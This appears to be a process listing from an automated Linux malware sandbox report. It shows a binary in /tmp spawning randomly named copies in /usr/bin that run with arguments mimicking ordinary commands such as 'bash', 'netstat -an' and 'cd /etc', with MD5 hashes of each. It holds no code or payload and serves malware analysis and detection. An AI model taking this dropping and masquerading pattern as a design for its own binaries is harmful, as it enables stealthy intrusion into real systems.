                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:/usr/bin/kfgwgvyckw bash 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:/usr/bin/kfgwgvyckw id 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:/usr/bin/kfgwgvyckw "netstat -an" 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:/usr/bin/kfgwgvyckw "sleep 1" 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:52
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/kfgwgvyckw
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:30de9814b108653bd6e70efbc3520d2e

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:/usr/bin/hymrnjeilx bash 6230
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:-
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:/usr/bin/hymrnjeilx pwd 6230
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:-
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:/usr/bin/hymrnjeilx gnome-terminal 6230
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:-
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:/usr/bin/hymrnjeilx gnome-terminal 6230
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:-
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:/usr/bin/hymrnjeilx "ls -la" 6230
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:34:57
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/hymrnjeilx
                                                                  Arguments:-
                                                                  File size:625900 bytes
                                                                  MD5 hash:c629e828153da3fd68b89cb0ab74ae95

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:/usr/bin/rjhjbiwpsr uptime 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:/usr/bin/rjhjbiwpsr "grep \"A\"" 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:/usr/bin/rjhjbiwpsr ls 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:/usr/bin/rjhjbiwpsr gnome-terminal 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:/usr/bin/rjhjbiwpsr "cd /etc" 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:02
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/rjhjbiwpsr
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:443f96e802359086570a6f584c903966

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:/usr/bin/nopfevkjnk who 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:/usr/bin/nopfevkjnk top 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:/usr/bin/nopfevkjnk "sleep 1" 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:/usr/bin/nopfevkjnk uptime 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:/usr/bin/nopfevkjnk "grep \"A\"" 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:07
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/nopfevkjnk
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:b246baae89c9f63df84f140ebbf62206

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:/usr/bin/vjejifjmgs uptime 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:/usr/bin/vjejifjmgs id 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:/usr/bin/vjejifjmgs "grep \"A\"" 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:/usr/bin/vjejifjmgs sh 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/tmp/HaJTqGiPpD
                                                                  Arguments:-
                                                                  File size:625867 bytes
                                                                  MD5 hash:a14578469fab44514dfca6c4eead755d

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:/usr/bin/vjejifjmgs pwd 6230
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:35:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/bin/vjejifjmgs
                                                                  Arguments:-
                                                                  File size:625889 bytes
                                                                  MD5 hash:d334dfbf8bb47bf697921a7ccd6b3ad6

                                                                  Start time (UTC):13:33:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/lib/systemd/systemd
                                                                  Arguments:-
                                                                  File size:1620224 bytes
                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                  Start time (UTC):13:33:12
                                                                  Start date (UTC):20/08/2024
                                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                  File size:22760 bytes
                                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e